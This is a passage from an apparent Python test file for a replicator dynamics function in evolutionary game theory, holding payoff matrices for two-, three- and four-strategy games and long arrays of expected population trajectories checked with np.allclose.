[0.51846265, 0.48153735], [0.51755449, 0.48244551], [0.51669091, 0.48330909], [0.51586971, 0.48413029], [0.51508885, 0.48491115], [0.51434634, 0.48565366], [0.51364031, 0.48635969], [0.51296897, 0.48703103], [0.51233064, 0.48766936], [0.51172369, 0.48827631], [0.51114658, 0.48885342], [0.51059785, 0.48940215], [0.51007612, 0.48992388], [0.50958005, 0.49041995], [0.50910838, 0.49089162], [0.50865992, 0.49134008], [0.50823353, 0.49176647], [0.50782813, 0.49217187], [0.50744267, 0.49255733], [0.50707619, 0.49292381], [0.50672775, 0.49327225], [0.50639645, 0.49360355], [0.50608147, 0.49391853], [0.50578199, 0.49421801], [0.50549726, 0.49450274], [0.50522655, 0.49477345], [0.50496916, 0.49503084], [0.50472445, 0.49527555], [0.50449178, 0.49550822], ], ) xs = replicator_dynamics(y0=y0, timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_example_2(): M = np.array([[3, 2], [4, 1]]) y0 = np.array([0.65, 0.35]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [0.65, 0.35], [0.64323298, 0.35676702], [0.63671861, 0.36328139], [0.63045449, 0.36954551], [0.62443708, 0.37556292], [0.61866205, 0.38133795], [0.61312433, 0.38687567], [0.60781832, 0.39218168], [0.60273792, 0.39726208], [0.5978767, 0.4021233], [0.59322796, 0.40677204], [0.5887848, 0.4112152], [0.58454021, 0.41545979], [0.58048714, 0.41951286], [0.57661851, 0.42338149], [0.57292729, 0.42707271], [0.56940652, 0.43059348], [0.56604936, 0.43395064], [0.56284908, 0.43715092], [0.55979911, 0.44020089], [0.55689305, 0.44310695], [0.5541247, 0.4458753], [0.551488, 0.448512], [0.54897713, 0.45102287], [0.54658644, 0.45341356], [0.5443105, 0.4556895], [0.54214408, 0.45785592], [0.54008213, 0.45991787], [0.53811982, 0.46188018], [0.53625251, 0.46374749], [0.53447575, 0.46552425], [0.53278527, 0.46721473], [0.53117701, 0.46882299], [0.52964705, 0.47035295], [0.52819167, 0.47180833], [0.5268073, 0.4731927], [0.52549054, 0.47450946], [0.52423814, 0.47576186], [0.52304699, 0.47695301], [0.52191414, 0.47808586], [0.52083678, 0.47916322], [0.5198122, 0.4801878], [0.51883785, 0.48116215], [0.51791129, 0.48208871], [0.5170302, 0.4829698], [0.51619235, 0.48380765], [0.51539564, 0.48460436], [0.51463806, 0.48536194], [0.51391769, 0.48608231], [0.51323273, 0.48676727], [0.51258143, 0.48741857], [0.51196214, 0.48803786], [0.51137331, 0.48862669], [0.51081343, 0.48918657], [0.51028109, 0.48971891], [0.50977494, 0.49022506], [0.50929368, 0.49070632], [0.50883611, 0.49116389], [0.50840105, 0.49159895], [0.5079874, 0.4920126], [0.5075941, 0.4924059], [0.50722017, 0.49277983], [0.50686464, 0.49313536], [0.5065266, 0.4934734], [0.50620521, 0.49379479], [0.50589964, 0.49410036], [0.50560912, 0.49439088], [0.5053329, 0.4946671], [0.50507027, 0.49492973], [0.50482058, 0.49517942], [0.50458318, 0.49541682], [0.50435748, 0.49564252], [0.50414288, 0.49585712], [0.50393885, 0.49606115], [0.50374487, 0.49625513], [0.50356044, 0.49643956], [0.5033851, 0.4966149], [0.50321838, 0.49678162], [0.50305988, 0.49694012], [0.50290918, 0.49709082], [0.50276591, 0.49723409], [0.50262969, 0.49737031], [0.50250018, 0.49749982], [0.50237704, 0.49762296], [0.50225997, 0.49774003], [0.50214867, 0.49785133], [0.50204285, 0.49795715], [0.50194224, 0.49805776], [0.50184658, 0.49815342], [0.50175564, 0.49824436], [0.50166917, 0.49833083], [0.50158696, 0.49841304], [0.50150881, 0.49849119], [0.5014345, 0.4985655], [0.50136385, 0.49863615], [0.50129668, 0.49870332], [0.50123281, 0.49876719], [0.5011721, 0.4988279], 
[0.50111437, 0.49888563], [0.50105949, 0.49894051], ] ) xs = replicator_dynamics(y0=y0, timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_example_3_default_y0(): M = np.array([[8, 2], [5, 3]]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [5.00000000e-01, 5.00000000e-01], [5.26546322e-01, 4.73453678e-01], [5.55724197e-01, 4.44275803e-01], [5.87511410e-01, 4.12488590e-01], [6.21728489e-01, 3.78271511e-01], [6.57990146e-01, 3.42009854e-01], [6.95672143e-01, 3.04327857e-01], [7.33912742e-01, 2.66087258e-01], [7.71667086e-01, 2.28332914e-01], [8.07818764e-01, 1.92181236e-01], [8.41329566e-01, 1.58670434e-01], [8.71386505e-01, 1.28613495e-01], [8.97500124e-01, 1.02499876e-01], [9.19528237e-01, 8.04717629e-02], [9.37629038e-01, 6.23709623e-02], [9.52172012e-01, 4.78279882e-02], [9.63640143e-01, 3.63598573e-02], [9.72547714e-01, 2.74522863e-02], [9.79383883e-01, 2.06161168e-02], [9.84581519e-01, 1.54184812e-02], [9.88504989e-01, 1.14950108e-02], [9.91450448e-01, 8.54955249e-03], [9.93652534e-01, 6.34746643e-03], [9.95293742e-01, 4.70625842e-03], [9.96514084e-01, 3.48591598e-03], [9.97419907e-01, 2.58009292e-03], [9.98091404e-01, 1.90859574e-03], [9.98588714e-01, 1.41128551e-03], [9.98956761e-01, 1.04323949e-03], [9.99228997e-01, 7.71002583e-04], [9.99430288e-01, 5.69712057e-04], [9.99579078e-01, 4.20922069e-04], [9.99689037e-01, 3.10962897e-04], [9.99770287e-01, 2.29713463e-04], [9.99830315e-01, 1.69684731e-04], [9.99874662e-01, 1.25338089e-04], [9.99907422e-01, 9.25784618e-05], [9.99931619e-01, 6.83805402e-05], [9.99949493e-01, 5.05073861e-05], [9.99962695e-01, 3.73049637e-05], [9.99972447e-01, 2.75532065e-05], [9.99979649e-01, 2.03505730e-05], [9.99984969e-01, 1.50308175e-05], [9.99988898e-01, 1.11015649e-05], [9.99991801e-01, 8.19919968e-06], [9.99993944e-01, 6.05565505e-06], [9.99995527e-01, 4.47259259e-06], [9.99996697e-01, 3.30326369e-06], [9.99997560e-01, 2.43964910e-06], [9.99998198e-01, 1.80194467e-06], [9.99998669e-01, 1.33084681e-06], [9.99999018e-01, 9.82166934e-07], [9.99999275e-01, 7.25194883e-07], [9.99999464e-01, 5.35772717e-07], [9.99999604e-01, 3.96066315e-07], [9.99999707e-01, 2.92673377e-07], [9.99999784e-01, 2.16251201e-07], [9.99999840e-01, 1.59970163e-07], [9.99999882e-01, 1.18489534e-07], [9.99999912e-01, 8.79198227e-08], [9.99999935e-01, 6.47958220e-08], [9.99999952e-01, 4.76360370e-08], [9.99999965e-01, 3.46731961e-08], [9.99999974e-01, 2.55665790e-08], [9.99999981e-01, 1.86146820e-08], [9.99999986e-01, 1.36425118e-08], [9.99999990e-01, 1.00816167e-08], [9.99999992e-01, 7.55059409e-09], [9.99999994e-01, 5.67732943e-09], [9.99999996e-01, 4.28158816e-09], [9.99999997e-01, 3.20976917e-09], [9.99999998e-01, 2.40345206e-09], [9.99999998e-01, 1.78669125e-09], [9.99999999e-01, 1.33286584e-09], [9.99999999e-01, 9.89591714e-10], [9.99999999e-01, 7.40089560e-10], [9.99999999e-01, 5.51209294e-10], [1.00000000e00, 3.28925518e-10], [1.00000000e00, 1.11214696e-10], [1.00000000e00, -7.15664780e-11], [1.00000000e00, -2.19418003e-10], [1.00000000e00, -3.32339878e-10], [1.00000000e00, -4.10332104e-10], [1.00000000e00, -4.53394682e-10], [1.00000000e00, -4.61527610e-10], [9.99999999e-01, -4.34730889e-10], [9.99999999e-01, -3.73004520e-10], [9.99999999e-01, -3.39039249e-10], [9.99999999e-01, -3.64704692e-10], [9.99999999e-01, -3.81253172e-10], [9.99999999e-01, -3.88684691e-10], [9.99999999e-01, -3.86999249e-10], [9.99999999e-01, -3.76196845e-10], [9.99999999e-01, -3.56277479e-10], [9.99999999e-01, 
-3.27241152e-10], [9.99999999e-01, -2.89087864e-10], [9.99999999e-01, -2.41817614e-10], [9.99999998e-01, -2.02072563e-10], [9.99999998e-01, -1.86998011e-10], [9.99999998e-01, -1.71923460e-10], ] ) xs = replicator_dynamics(timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_3_example_1(): M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) y0 = np.array([0.2, 0.1, 0.7]) timepoints = np.linspace(0, 20, 100) expected_xs_over_time = np.array( [ [0.2, 0.1, 0.7], [0.25084045, 0.09789735, 0.6512622], [0.30680235, 0.096512, 0.59668565], [0.36555987, 0.09596192, 0.53847822], [0.4244435, 0.09636333, 0.47919317], [0.48091315, 0.097819, 0.42126785], [0.53292835, 0.10041113, 0.36666052], [0.57912, 0.10419922, 0.31668078], [0.61877662, 0.10922098, 0.2720024], [0.6517203, 0.11549383, 0.23278586], [0.67814881, 0.12301537, 0.19883582], [0.69849303, 0.13176241, 0.16974455], [0.71330936, 0.14168906, 0.14500158], [0.72320749, 0.15272473, 0.12406778], [0.72880646, 0.16477305, 0.10642048], [0.73070961, 0.17771243, 0.09157796], [0.72949106, 0.19139871, 0.07911023], [0.72568835, 0.2056699, 0.06864175], [0.719798, 0.22035258, 0.05984942], [0.71227239, 0.23526931, 0.0524583], [0.70351757, 0.25024617, 0.04623626], [0.69389181, 0.26511966, 0.04098853], [0.68370534, 0.27974226, 0.03655241], [0.67322108, 0.29398645, 0.03279247], [0.66265685, 0.30774686, 0.02959629], [0.65218849, 0.32094081, 0.0268707], [0.64195385, 0.33350758, 0.02453857], [0.63205732, 0.34540661, 0.02253606], [0.62257449, 0.35661514, 0.02081038], [0.61355672, 0.36712552, 0.01931776], [0.60503556, 0.37694249, 0.01802195], [0.59702658, 0.38608059, 0.01689283], [0.58953289, 0.39456178, 0.01590533], [0.58254803, 0.40241341, 0.01503856], [0.57605847, 0.40966651, 0.01427502], [0.5700456, 0.41635432, 0.01360008], [0.5644874, 0.42251121, 0.01300139], [0.55935967, 0.42817177, 0.01246856], [0.55463707, 0.43337015, 0.01199279], [0.55029384, 0.43813956, 0.0115666], [0.54630443, 0.44251196, 0.01118362], [0.54264384, 0.44651774, 0.01083841], [0.53928799, 0.4501857, 0.01052632], [0.53621383, 0.45354285, 0.01024332], [0.53339955, 0.45661449, 0.00998596], [0.5308246, 0.45942417, 0.00975123], [0.52846971, 0.46199374, 0.00953656], [0.5263169, 0.46434344, 0.00933966], [0.52434948, 0.46649195, 0.00915857], [0.52255195, 0.46845648, 0.00899157], [0.52091, 0.47025287, 0.00883714], [0.51941039, 0.47189566, 0.00869395], [0.51804096, 0.47339821, 0.00856083], [0.51679051, 0.47477274, 0.00843675], [0.51564876, 0.47603045, 0.0083208], [0.51460626, 0.47718159, 0.00821216], [0.51365436, 0.47823552, 0.00811011], [0.51278515, 0.47920082, 0.00801403], [0.51199138, 0.48008529, 0.00792334], [0.5112664, 0.48089607, 0.00783753], [0.51060417, 0.48163968, 0.00775615], [0.50999914, 0.48232207, 0.0076788], [0.50944625, 0.48294864, 0.00760511], [0.50894089, 0.48352435, 0.00753476], [0.50847885, 0.48405369, 0.00746746], [0.50805628, 0.48454077, 0.00740295], [0.50766968, 0.48498934, 0.00734099], [0.50731584, 0.48540279, 0.00728137], [0.50699186, 0.48578424, 0.0072239], [0.50669508, 0.4861365, 0.00716841], [0.50642309, 0.48646217, 0.00711475], [0.50617366, 0.48676357, 0.00706277], [0.50594481, 0.48704285, 0.00701234], [0.50573469, 0.48730195, 0.00696337], [0.50554164, 0.48754263, 0.00691573], [0.50536414, 0.48776652, 0.00686933], [0.50520082, 0.48797508, 0.0068241], [0.5050504, 0.48816965, 0.00677995], [0.50491176, 0.48835143, 0.00673681], [0.50478384, 0.48852154, 0.00669463], [0.50466569, 0.48868099, 0.00665333], [0.50455645, 0.48883068, 
0.00661287], [0.50445532, 0.48897146, 0.00657321], [0.50436161, 0.48910409, 0.00653429], [0.50427466, 0.48922926, 0.00649607], [0.50419387, 0.4893476, 0.00645853], [0.5041187, 0.48945968, 0.00642162], [0.50404866, 0.48956602, 0.00638531], [0.50398331, 0.48966711, 0.00634958], [0.50392223, 0.48976337, 0.0063144], [0.50386505, 0.48985519, 0.00627975], [0.50381145, 0.48994295, 0.0062456], [0.50376111, 0.49002695, 0.00621194], [0.50371375, 0.49010751, 0.00617874], [0.50366912, 0.49018489, 0.00614599], [0.50362698, 0.49025935, 0.00611367], [0.50358714, 0.4903311, 0.00608177], [0.50354938, 0.49040035, 0.00605027], [0.50351355, 0.49046729, 0.00601915], [0.50347948, 0.4905321, 0.00598842], ] ) xs = replicator_dynamics(y0=y0, A=M, timepoints=timepoints) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_3_example_default_timepoints(): M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) y0 = np.array([0.2, 0.1, 0.7]) expected_x_1 = np.array([[0.20237066, 0.09988063, 0.69774871]]) expected_x_1000 = np.array([[0.52171238, 0.46937475, 0.00891287]]) xs = replicator_dynamics(y0=y0, A=M) assert np.allclose(xs[1], expected_x_1) assert np.allclose(xs[-1], expected_x_1000) assert len(xs) == 1000 def test_replicator_dynamics_game_size_3_example_2(): M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) y0 = np.array([0.5, 0.1, 0.4]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [0.5, 0.1, 0.4], [0.52559968, 0.10135984, 0.37304048], [0.5497745, 0.10301946, 0.34720604], [0.57240754, 0.10498432, 0.32260814], [0.59342086, 0.10725857, 0.29932057], [0.61277116, 0.10984506, 0.27738379], [0.63044466, 0.11274538, 0.25680996], [0.64645211, 0.11595993, 0.23758796], [0.66082391, 0.11948781, 0.21968828], [0.67360575, 0.12332687, 0.20306738], [0.68485481, 0.1274736, 0.18767159], [0.69463657, 0.13192312, 0.17344031], [0.70302219, 0.13666906, 0.16030874], [0.71008648, 0.14170354, 0.14820998], [0.71590619, 0.14701708, 0.13707673], [0.72055883, 0.15259863, 0.12684255], [0.7241217, 0.1584355, 0.1174428], [0.72667121, 0.16451346, 0.10881533], [0.72828236, 0.17081672, 0.10090091], [0.72902836, 0.17732812, 0.09364353], [0.72898035, 0.18402915, 0.08699051], [0.72820721, 0.19090019, 0.08089259], [0.72677541, 0.19792069, 0.0753039], [0.72474884, 0.20506931, 0.07018184], [0.72218875, 0.21232425, 0.06548701], [0.71915361, 0.21966337, 0.06118302], [0.71569909, 0.22706454, 0.05723638], [0.71187792, 0.23450578, 0.05361629], [0.70773992, 0.24196557, 0.0502945], [0.7033319, 0.24942298, 0.04724512], [0.69869765, 0.25685792, 0.04444443], [0.69387795, 0.26425127, 0.04187078], [0.68891058, 0.27158505, 0.03950437], [0.68383036, 0.27884249, 0.03732715], [0.67866917, 0.28600818, 0.03532264], [0.67345609, 0.29306806, 0.03347585], [0.66821741, 0.3000095, 0.03177308], [0.66297682, 0.30682127, 0.03020191], [0.65775544, 0.31349356, 0.02875099], [0.65257204, 0.32001794, 0.02741002], [0.64744309, 0.3263873, 0.02616961], [0.64238298, 0.3325958, 0.02502123], [0.63740411, 0.33863879, 0.0239571], [0.63251708, 0.34451275, 0.02297018], [0.62773079, 0.35021519, 0.02205402], [0.62305263, 0.35574459, 0.02120278], [0.61848858, 0.36110029, 0.02041112], [0.6140434, 0.36628239, 0.01967421], [0.60972067, 0.37129171, 0.01898762], [0.60552299, 0.37612969, 0.01834732], [0.60145203, 0.38079834, 0.01774963], [0.59750868, 0.3853001, 0.01719122], [0.59369315, 0.38963783, 0.01666902], [0.59000503, 0.39381472, 0.01618024], [0.58644338, 0.39783429, 0.01572233], [0.5830068, 0.40170025, 0.01529295], [0.57969351, 0.40541652, 
0.01488997], [0.57650141, 0.40898716, 0.01451143], [0.57342812, 0.41241633, 0.01415554], [0.57047106, 0.41570828, 0.01382066], [0.56762744, 0.41886729, 0.01350527], [0.56489435, 0.42189765, 0.01320799], [0.56226876, 0.42480368, 0.01292755], [0.55974758, 0.42758964, 0.01266278], [0.55732765, 0.43025976, 0.01241259], [0.5550058, 0.43281821, 0.01217599], [0.55277882, 0.43526911, 0.01195207], [0.55064354, 0.43761648, 0.01173997], [0.54859681, 0.43986427, 0.01153892], [0.54663548, 0.44201632, 0.0113482], [0.54475648, 0.44407639, 0.01116712], [0.54295678, 0.44604813, 0.01099509], [0.54123342, 0.44793507, 0.01083152], [0.53958348, 0.44974065, 0.01067587], [0.53800412, 0.45146821, 0.01052767], [0.53649261, 0.45312096, 0.01038644], [0.53504623, 0.45470201, 0.01025176], [0.5336624, 0.45621436, 0.01012324], [0.53233858, 0.45766092, 0.0100005], [0.53107233, 0.45904447, 0.0098832], [0.52986128, 0.46036769, 0.00977103], [0.52870314, 0.46163318, 0.00966368], [0.52759571, 0.46284341, 0.00956088], [0.52653686, 0.46400078, 0.00946235], [0.52552454, 0.46510759, 0.00936787], [0.52455677, 0.46616604, 0.0092772], [0.52363164, 0.46717823, 0.00919013], [0.52274734, 0.46814621, 0.00910645], [0.5219021, 0.46907191, 0.00902599], [0.52109424, 0.4699572, 0.00894857], [0.52032212, 0.47080386, 0.00887402], [0.5195842, 0.47161362, 0.00880218], [0.51887898, 0.47238809, 0.00873292], [0.51820503, 0.47312887, 0.0086661], [0.51756097, 0.47383744, 0.00860159], [0.51694549, 0.47451525, 0.00853926], [0.51635732, 0.47516367, 0.00847902], [0.51579525, 0.47578401, 0.00842074], [0.51525813, 0.47637754, 0.00836433], [0.51474485, 0.47694545, 0.0083097], ] ) xs = replicator_dynamics(y0=y0, timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_3_example_1_default_y0(): M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [0.33333333, 0.33333333, 0.33333333], [0.34828459, 0.3262229, 0.32549251], [0.36315697, 0.31983211, 0.31701092], [0.37787298, 0.31412581, 0.30800121], [0.3923581, 0.30907001, 0.29857189], [0.40654213, 0.30463189, 0.28882598], [0.42036029, 0.30077978, 0.27885992], [0.43375425, 0.29748314, 0.26876261], [0.44667261, 0.29471251, 0.25861488], [0.45907142, 0.29243945, 0.24848913], [0.47091426, 0.29063654, 0.23844919], [0.48217224, 0.2892773, 0.22855046], [0.49282377, 0.28833613, 0.2188401], [0.50285411, 0.28778834, 0.20935755], [0.51225504, 0.28761002, 0.20013494], [0.52102418, 0.28777809, 0.19119773], [0.52916446, 0.28827022, 0.18256531], [0.53668352, 0.28906482, 0.17425166], [0.54359302, 0.29014101, 0.16626597], [0.54990812, 0.2914786, 0.15861327], [0.55564688, 0.2930581, 0.15129501], [0.5608297, 0.29486067, 0.14430963], [0.56547887, 0.29686812, 0.13765301], [0.56961809, 0.29906291, 0.131319], [0.57327211, 0.30142816, 0.12529973], [0.57646634, 0.30394761, 0.11958605], [0.57922655, 0.30660565, 0.1141678], [0.58157859, 0.30938732, 0.1090341], [0.58354816, 0.31227828, 0.10417356], [0.58516064, 0.31526484, 0.09957451], [0.58644089, 0.31833398, 0.09522513], [0.58741312, 0.32147329, 0.09111359], [0.58810078, 0.32467101, 0.08722821], [0.58852649, 0.32791604, 0.08355748], [0.58871195, 0.33119789, 0.08009016], [0.58867791, 0.33450672, 0.07681537], [0.58844412, 0.33783332, 0.07372256], [0.58802931, 0.34116907, 0.07080162], [0.5874512, 0.34450598, 0.06804282], [0.58672648, 0.34783662, 0.0654369], [0.58587083, 0.35115417, 0.06297501], [0.58489893, 0.35445233, 0.06064874], [0.58382451, 0.35772538, 0.05845012], 
[0.58266033, 0.36096807, 0.05637159], [0.58141828, 0.3641757, 0.05440602], [0.58010932, 0.36734401, 0.05254667], [0.57874361, 0.37046921, 0.05078718], [0.57733051, 0.37354793, 0.04912156], [0.57587859, 0.37657722, 0.04754419], [0.57439572, 0.37955451, 0.04604977], [0.57288908, 0.38247759, 0.04463333], [0.57136522, 0.38534459, 0.04329019], [0.56983008, 0.38815395, 0.04201597], [0.56828904, 0.3909044, 0.04080656], [0.56674693, 0.39359496, 0.03965812], [0.56520812, 0.39622487, 0.03856701], [0.56367651, 0.39879364, 0.03752985], [0.56215558, 0.40130095, 0.03654348], [0.5606484, 0.40374669, 0.03560491], [0.5591577, 0.40613095, 0.03471135], [0.55768587, 0.40845392, 0.03386021], [0.55623498, 0.410716, 0.03304902], [0.55480684, 0.41291766, 0.0322755], [0.55340299, 0.41505951, 0.0315375], [0.55202472, 0.41714228, 0.030833], [0.55067314, 0.41916674, 0.03016012], [0.54934913, 0.42113379, 0.02951708], [0.5480534, 0.42304437, 0.02890223], [0.54678652, 0.42489947, 0.02831401], [0.5455489, 0.42670015, 0.02775096], [0.54434081, 0.42844749, 0.0272117], [0.54316241, 0.43014264, 0.02669495], [0.54201376, 0.43178673, 0.02619951], [0.54089483, 0.43338094, 0.02572423], [0.53980549, 0.43492646, 0.02526805], [0.53874555, 0.43642449, 0.02482996], [0.53771475, 0.43787623, 0.02440903], [0.53671276, 0.43928288, 0.02400436], [0.53573922, 0.44064566, 0.02361512], [0.53479372, 0.44196575, 0.02324053], [0.53387581, 0.44324434, 0.02287984], [0.53298501, 0.44448262, 0.02253237], [0.53212081, 0.44568175, 0.02219745], [0.53128267, 0.44684287, 0.02187446], [0.53047007, 0.44796711, 0.02156282], [0.52968241, 0.4490556, 0.02126199], [0.52891915, 0.45010942, 0.02097143], [0.52817969, 0.45112965, 0.02069066], [0.52746344, 0.45211733, 0.02041923], [0.52676982, 0.4530735, 0.02015668], [0.52609823, 0.45399916, 0.01990261], [0.52544809, 0.45489529, 0.01965662], [0.5248188, 0.45576285, 0.01941835], [0.52420978, 0.45660278, 0.01918744], [0.52362045, 0.45741598, 0.01896357], [0.52305024, 0.45820334, 0.01874642], [0.52249859, 0.45896572, 0.0185357], [0.52196493, 0.45970395, 0.01833112], [0.52144873, 0.46041886, 0.01813241], [0.52094945, 0.46111123, 0.01793933], ] ) xs = replicator_dynamics(timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_4_example_1(): M = np.array([[3, 2, 4, 2], [5, 1, 1, 3], [6, 2, 3, 2], [1, 3, 4, 7]]) y0 = np.array([0.2, 0.2, 0.5, 0.1]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [2.00000000e-01, 2.00000000e-01, 5.00000000e-01, 1.00000000e-01], [2.03014607e-01, 1.79775683e-01, 5.12598077e-01, 1.04611633e-01], [2.05602634e-01, 1.61119562e-01, 5.24116145e-01, 1.09161659e-01], [2.07780154e-01, 1.44008247e-01, 5.34544791e-01, 1.13666808e-01], [2.09565963e-01, 1.28397079e-01, 5.43887293e-01, 1.18149665e-01], [2.10980399e-01, 1.14224398e-01, 5.52156911e-01, 1.22638292e-01], [2.12044290e-01, 1.01415511e-01, 5.59374243e-01, 1.27165955e-01], [2.12777911e-01, 8.98868138e-02, 5.65564304e-01, 1.31770970e-01], [2.13200213e-01, 7.95489630e-02, 5.70754057e-01, 1.36496767e-01], [2.13328015e-01, 7.03100693e-02, 5.74969767e-01, 1.41392148e-01], [2.13175377e-01, 6.20781199e-02, 5.78234667e-01, 1.46511836e-01], [2.12753003e-01, 5.47629634e-02, 5.80566684e-01, 1.51917349e-01], [2.12067694e-01, 4.82778457e-02, 5.81976254e-01, 1.57678207e-01], [2.11121790e-01, 4.25404241e-02, 5.82464120e-01, 1.63873667e-01], [2.09912560e-01, 3.74735370e-02, 5.82018990e-01, 1.70594913e-01], [2.08431491e-01, 3.30056010e-02, 5.80614947e-01, 1.77947961e-01], 
[2.06663415e-01, 2.90707653e-02, 5.78208424e-01, 1.86057396e-01], [2.04585400e-01, 2.56088838e-02, 5.74734550e-01, 1.95071166e-01], [2.02165324e-01, 2.25653431e-02, 5.70102601e-01, 2.05166732e-01], [1.99360030e-01, 1.98907774e-02, 5.64190280e-01, 2.16558913e-01], [1.96112947e-01, 1.75407096e-02, 5.56836486e-01, 2.29509857e-01], [1.92351073e-01, 1.54751355e-02, 5.47832225e-01, 2.44341566e-01], [1.87981233e-01, 1.36580686e-02, 5.36909436e-01, 2.61451263e-01], [1.82885632e-01, 1.20570529e-02, 5.23727800e-01, 2.81329515e-01], [1.76917104e-01, 1.06426524e-02, 5.07860610e-01, 3.04579633e-01], [1.69895030e-01, 9.38792086e-03, 4.88782663e-01, 3.31934386e-01], [1.61604457e-01, 8.26788100e-03, 4.65867494e-01, 3.64260168e-01], [1.51803622e-01, 7.25907672e-03, 4.38409213e-01, 4.02528089e-01], [1.40249665e-01, 6.33936318e-03, 4.05697635e-01, 4.47713338e-01], [1.26757836e-01, 5.48826132e-03, 3.67191501e-01, 5.00562402e-01], [1.11310569e-01, 4.68839622e-03, 3.22837907e-01, 5.61163128e-01], [9.42142047e-02, 3.92847992e-03, 2.73531647e-01, 6.28325668e-01], [7.62423767e-02, 3.20736701e-03, 2.21536256e-01, 6.99014000e-01], [5.86232788e-02, 2.53656143e-03, 1.70448974e-01, 7.68391186e-01], [4.27407988e-02, 1.93705559e-03, 1.24328358e-01, 8.30993787e-01], [2.96454250e-02, 1.42958466e-03, 8.62637052e-02, 8.82661285e-01], [1.97150138e-02, 1.02426416e-03, 5.73804221e-02, 9.21880300e-01], [1.26941686e-02, 7.17049061e-04, 3.69516241e-02, 9.49637158e-01], [7.98780274e-03, 4.93669057e-04, 2.32539272e-02, 9.68264601e-01], [4.94920545e-03, 3.36053575e-04, 1.44088459e-02, 9.80305895e-01], [3.03598214e-03, 2.27083826e-04, 8.83910216e-03, 9.87897832e-01], [1.85064498e-03, 1.52736531e-04, 5.38817086e-03, 9.92608448e-01], [1.12369181e-03, 1.02433840e-04, 3.27168224e-03, 9.95502192e-01], [6.80655561e-04, 6.85759243e-05, 1.98177675e-03, 9.97268992e-01], [4.11689813e-04, 4.58593611e-05, 1.19866970e-03, 9.98343781e-01], [2.48785662e-04, 3.06476572e-05, 7.24362584e-04, 9.98996204e-01], [1.50260753e-04, 2.04735127e-05, 4.37498917e-04, 9.99391767e-01], [9.07242335e-05, 1.36735679e-05, 2.64152780e-04, 9.99631449e-01], [5.47664709e-05, 9.13076963e-06, 1.59458220e-04, 9.99776645e-01], [3.30562786e-05, 6.09669114e-06, 9.62467961e-05, 9.99864600e-01], [1.99507373e-05, 4.07058812e-06, 5.80886620e-05, 9.99917890e-01], [1.20411070e-05, 2.71775634e-06, 3.50589495e-05, 9.99950182e-01], [7.26674553e-06, 1.81448136e-06, 2.11578956e-05, 9.99969761e-01], [4.38544006e-06, 1.21140807e-06, 1.27686717e-05, 9.99981634e-01], [2.64635182e-06, 8.08751772e-07, 7.70513293e-06, 9.99988840e-01], [1.59658805e-06, 5.39894155e-07, 4.64863489e-06, 9.99993215e-01], [9.63663665e-07, 3.60440823e-07, 2.80580866e-06, 9.99995870e-01], [5.81458028e-07, 2.40616233e-07, 1.69297654e-06, 9.99997485e-01], [3.50999339e-07, 1.60627592e-07, 1.02197170e-06, 9.99998466e-01], [2.12105795e-07, 1.07247667e-07, 6.17568459e-07, 9.99999063e-01], [1.28067075e-07, 7.16010679e-08, 3.72880837e-07, 9.99999427e-01], [7.73743336e-08, 4.78056299e-08, 2.25283557e-07, 9.99999650e-01], [4.68788643e-08, 3.19497919e-08, 1.36492772e-07, 9.99999785e-01], [2.84194486e-08, 2.13634439e-08, 8.27462311e-08, 9.99999867e-01], [1.70359632e-08, 1.42530879e-08, 4.96020091e-08, 9.99999919e-01], [1.01359124e-08, 9.49314320e-09, 2.95117812e-08, 9.99999951e-01], [6.01592329e-09, 6.30408466e-09, 1.75159971e-08, 9.99999970e-01], [3.60293196e-09, 4.18726641e-09, 1.04903175e-08, 9.99999982e-01], [2.21909257e-09, 2.79929916e-09, 6.46112278e-09, 9.99999989e-01], [1.38252426e-09, 1.87597724e-09, 4.02536563e-09, 
9.99999993e-01], [8.55072319e-10, 1.25591890e-09, 2.48963351e-09, 9.99999995e-01], [5.23161237e-10, 8.39645178e-10, 1.52323929e-09, 9.99999997e-01], [3.19635397e-10, 5.61528892e-10, 9.30652271e-10, 9.99999998e-01], [1.96274641e-10, 3.75788327e-10, 5.71474380e-10, 9.99999999e-01], [7.90089904e-11, 2.01486586e-10, 2.30043033e-10, 9.99999999e-01], [-2.75223088e-11, 4.43008850e-11, -8.01341155e-11, 1.00000000e00], [-1.02459537e-10, -7.11494645e-11, -2.98321786e-10, 1.00000000e00], [-1.45802696e-10, -1.44864462e-10, -4.24519978e-10, 1.00000000e00], [-1.57551783e-10, -1.76844109e-10, -4.58728693e-10, 1.00000000e00], [-1.37706801e-10, -1.67088404e-10, -4.00947928e-10, 1.00000000e00], [-1.15830837e-10, -1.52277395e-10, -3.37253748e-10, 1.00000000e00], [-1.27082255e-10, -1.76033398e-10, -3.70013445e-10, 1.00000000e00], [-1.30203828e-10, -1.87167004e-10, -3.79102236e-10, 9.99999999e-01], [-1.25195555e-10, -1.85678212e-10, -3.64520121e-10, 9.99999999e-01], [-1.12057437e-10, -1.71567024e-10, -3.26267100e-10, 9.99999999e-01], [-9.07894722e-11, -1.44833438e-10, -2.64343172e-10, 9.99999999e-01], [-6.58177915e-11, -1.29826786e-10, -1.91635490e-10, 9.99999998e-01], [-5.77524326e-11, -1.14827540e-10, -1.68152342e-10, 9.99999999e-01], [-4.96870738e-11, -9.98282933e-11, -1.44669194e-10, 9.99999999e-01], [-4.16217149e-11, -8.48290467e-11, -1.21186046e-10, 9.99999999e-01], [-3.35563561e-11, -6.98298001e-11, -9.77028982e-11, 9.99999999e-01], [-2.54909973e-11, -5.48305535e-11, -7.42197503e-11, 9.99999999e-01], [-1.74256384e-11, -3.98313069e-11, 